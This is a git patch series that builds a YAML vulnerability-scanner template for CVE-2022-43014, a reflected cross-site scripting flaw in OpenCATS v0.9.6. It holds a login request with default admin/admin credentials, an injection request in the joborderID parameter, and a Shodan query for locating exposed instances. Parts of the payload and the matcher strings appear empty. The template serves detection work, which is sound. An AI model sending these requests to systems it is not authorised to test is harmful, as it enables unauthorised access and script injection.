From b9c0977e5fe2371825d5d6c840fa65781ded9407 Mon Sep 17 00:00:00 2001
From: Arafat Ansari <54571841+arafatansari@users.noreply.github.com>
Date: Mon, 24 Oct 2022 18:45:28 +0530
Subject: [PATCH 1/5] Create CVE-2022-43014.yaml
---
cves/2022/CVE-2022-43014.yaml | 37 +++++++++++++++++++++++++++++++++++
1 file changed, 37 insertions(+)
create mode 100644 cves/2022/CVE-2022-43014.yaml
diff --git a/cves/2022/CVE-2022-43014.yaml b/cves/2022/CVE-2022-43014.yaml
new file mode 100644
index 0000000000..31c08e2177
--- /dev/null
+++ b/cves/2022/CVE-2022-43014.yaml
@@ -0,0 +1,37 @@
+id: CVE-2022-43014
+
+info:
+ name: OpenCATS - Cross Site Scripting
+ author: arafatansari
+ severity: medium
+ description: |
+ OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter.
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43014
+ tags: xss,cve,2022
+
+requests:
+ - raw:
+ - |
+ POST /index.php?m=login&a=attemptLogin HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ username=admin&password=admin
+
+ - |
+ GET /ajax.php?f=getPipelineJobOrder&joborderID=1)">%20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
+ Host: {{Hostname}}
+
+ host-redirects: true
+ max-redirects: 2
+ cookie-reuse: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - ''
From facef96006bf121f7f5b39f9fdc29d47d2aa1f5c Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Tue, 25 Oct 2022 02:09:45 +0530
Subject: [PATCH 2/5] Update CVE-2022-43014.yaml
---
cves/2022/CVE-2022-43014.yaml | 24 ++++++++++++++++++------
1 file changed, 18 insertions(+), 6 deletions(-)
diff --git a/cves/2022/CVE-2022-43014.yaml b/cves/2022/CVE-2022-43014.yaml
index 31c08e2177..2f2e1680fe 100644
--- a/cves/2022/CVE-2022-43014.yaml
+++ b/cves/2022/CVE-2022-43014.yaml
@@ -8,7 +8,11 @@ info:
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43014
- tags: xss,cve,2022
+ - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_joborderID.md
+ metadata:
+ verified: true
+ shodan-query: title:"OpenCATS"
+ tags: cve,cve2022,xss,opencats
requests:
- raw:
@@ -20,7 +24,7 @@ requests:
username=admin&password=admin
- |
- GET /ajax.php?f=getPipelineJobOrder&joborderID=1)">%20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
+ GET /ajax.php?f=getPipelineJobOrder&joborderID=1)">%20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
Host: {{Hostname}}
host-redirects: true
@@ -28,10 +32,18 @@ requests:
cookie-reuse: true
matchers-condition: and
matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+ - 'CATS='
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
- type: status
status:
- 200
-
- - type: word
- words:
- - ''
From 56edbe25dbdbefc7dfeec965cbff523b306a5635 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 25 Oct 2022 14:59:18 +0530
Subject: [PATCH 3/5] Update CVE-2022-43014.yaml
---
cves/2022/CVE-2022-43014.yaml | 19 +++++++++++++------
1 file changed, 13 insertions(+), 6 deletions(-)
diff --git a/cves/2022/CVE-2022-43014.yaml b/cves/2022/CVE-2022-43014.yaml
index 2f2e1680fe..124da07503 100644
--- a/cves/2022/CVE-2022-43014.yaml
+++ b/cves/2022/CVE-2022-43014.yaml
@@ -1,18 +1,20 @@
id: CVE-2022-43014
info:
- name: OpenCATS - Cross Site Scripting
+ name: OpenCATS v0.9.6 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the joborderID parameter.
reference:
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43014
- https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_joborderID.md
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-43014
+ classification:
+ cve-id: CVE-2022-43014
metadata:
verified: true
shodan-query: title:"OpenCATS"
- tags: cve,cve2022,xss,opencats
+ tags: cve,cve2022,xss,opencats,authenticated
requests:
- raw:
@@ -21,14 +23,19 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- username=admin&password=admin
+ username={{username}}&password={{password}}
- |
GET /ajax.php?f=getPipelineJobOrder&joborderID=1)">%20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
Host: {{Hostname}}
- host-redirects: true
- max-redirects: 2
+ payloads:
+ username:
+ - admin
+ password:
+ - admin
+ attack: pitchfork
+
cookie-reuse: true
matchers-condition: and
matchers:
From 845828de0fd88cabdea8190ae8b418e8b89ebb32 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 25 Oct 2022 16:39:45 +0530
Subject: [PATCH 4/5] Update CVE-2022-43014.yaml
---
cves/2022/CVE-2022-43014.yaml | 7 -------
1 file changed, 7 deletions(-)
diff --git a/cves/2022/CVE-2022-43014.yaml b/cves/2022/CVE-2022-43014.yaml
index 124da07503..02d6a393b8 100644
--- a/cves/2022/CVE-2022-43014.yaml
+++ b/cves/2022/CVE-2022-43014.yaml
@@ -29,13 +29,6 @@ requests:
GET /ajax.php?f=getPipelineJobOrder&joborderID=1)">%20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1
Host: {{Hostname}}
- payloads:
- username:
- - admin
- password:
- - admin
- attack: pitchfork
-
cookie-reuse: true
matchers-condition: and
matchers: